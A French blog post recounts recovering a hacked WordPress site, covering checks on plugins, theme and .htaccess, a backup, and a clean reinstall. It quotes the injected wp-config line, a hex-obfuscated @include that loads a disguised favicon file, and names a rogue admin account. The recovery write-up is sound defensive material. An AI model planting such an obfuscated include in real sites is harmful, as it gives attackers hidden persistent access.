Page blanche sur WordPress, erreur 500, site hacké !

Rétablir l'accès à son site WordPress après une tentative réussi de piratage

Des erreurs 500 à répétition dans WordPress ça pose toujours problème. Plein de raisons à cela :

  • Souci de plugin
  • Souci de thème
  • Souci de .htaccess
  • Souci de base de données
  • Site hacké

Bien sûr, si j’avais pris le temps d’installer un plugin de sauvegarde

Recherche sur l’ami Google avec page blanche WordPress et hop on tombe sur l’excellent article de Seomix sur la page blanche

Erreur 500 sur le serveur

Pour faire simple, les ressources du serveur d’hébergement sont sur-sollicitées : pour un hébergement de site WordPress chez O2switch (C’est pas un hébergement de Mickey ! ), c’est plutôt rare (Plutôt et Mickey, vous me suivez 😉 )

Souci de plugins / d’extensions

Le bon réflexe : connection en ftp : renommer le dossier plugins en plugins2 et appeler la page http://monsite.com/wp-admin/plugins.php

Normalement, les pages devraient se charger, il ne reste donc qu’à activer chacune des extensions les unes après les autres et voir quel plugin ou quelle association de plugins fout la zone.

  1. Renommer le dossier plugins2 en plugin
  2. Mettre à jour les plugins (un oubli passager sans doute)
  3. Activer/Désactiver les extensions WordPress
  4. Appeler plusieurs pages ou articles
  5. Désactiver et supprimer éventuellement le plugin fautif

Si la page reste blanche, ce n’est pas à cause des extensions.

Souci de thème

Même opération que pour les plugins

  1. Renommer le thème en thème2
  2. Appeler la page http://monsite.com/wp-admin/theme.php
  3. Installer un thème par défaut
  4. Corriger le thème (bon courage) et redonner au thème son nom originel et le réactiver

Si la page reste blanche, ce n’est pas à cause du thème

Souci de fichier .htaccess

Ce fichier à la racine du site gère entre autre les redirection d’url et tous les paramètres de votre installation WordPress.

  1. Le renommer en old.htaccess
  2. Récréer un fichier .htaccess
  3. Revenir dans les paramètres de permaliens de WordPress
  4. Remettre la même config
  5. Tout devrait être revenu dans l’ordre

Si la page reste blanche, ce n’est pas à cause du .htaccess

L’étau se resserre, maintenant, on va marcher sur des oeufs

Sauvegarde manuelle de la Base de Données et de tous les fichiers

  1. Un petit tour sur PhpMyAdmin, export de la base de données
  2. Un gros coup de ftp pour l’ensemble des fichiers du site (ça va prendre du temps)

Le fichier wp-config

On édite ce fichier et là surprise

1ère ligne : @include « \x2fhom\x653/m\x6foca\x69/at\x65lie\x72s-d\x65ram\x61ix.\x66r/w\x70-ad\x6din/\x6as/f\x61vic\x6fn_9\x30afb\x35.ic\x6f »;

De l’exotique dans la config WP, recherche sur Google et là ressort le gros mot Malware

Et là, les gouttes de sueur commencent à couler !

Un petit tour par PhpMyAdmin

Tiens dans la table user : un nouveau venu

wp.service.controller.O3FFS

Sans hésiter, je supprime

 

Et on commence le grand nettoyage

On jette un coup d’oeil au ftp et là surprise : ce n’est pas la même organisation : c’est parti pour le jeu des 7 erreurs

  1. On place toute l’installation actuelle vérolée de WordPress dans un dossier hacked
  2. On télécharge la dernière version de WordPress
  3. Upload dans le dossier site de la dernière version de WordPress
  4. Upload du fichier wp-config corrigé : j’accède enfin au back office
  5. Upload du dossier wp-content
  6. Suppression du dossier hacked
  7. Et tout va bien !

 

Et pour pas que cela recommence :

Installation de WordFence et configuration pour ne pas que cela se reproduise, alors on revoit tous les paramètres de sécurité de WordPress

En fin de compte, c’est amusant de remettre les mains dans le cambouis, si j’avais le temps, j’essaierais vraiment de voir quelle est la faille (d’un plugin, d’un thème, de WordPress) qui a été utilisée, peut-être que l’un d’entre vous a la solution. Je suis preneur de toutes les réflexions à ce sujet.

Photo by Ilya Pavlov on Unsplash

 

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *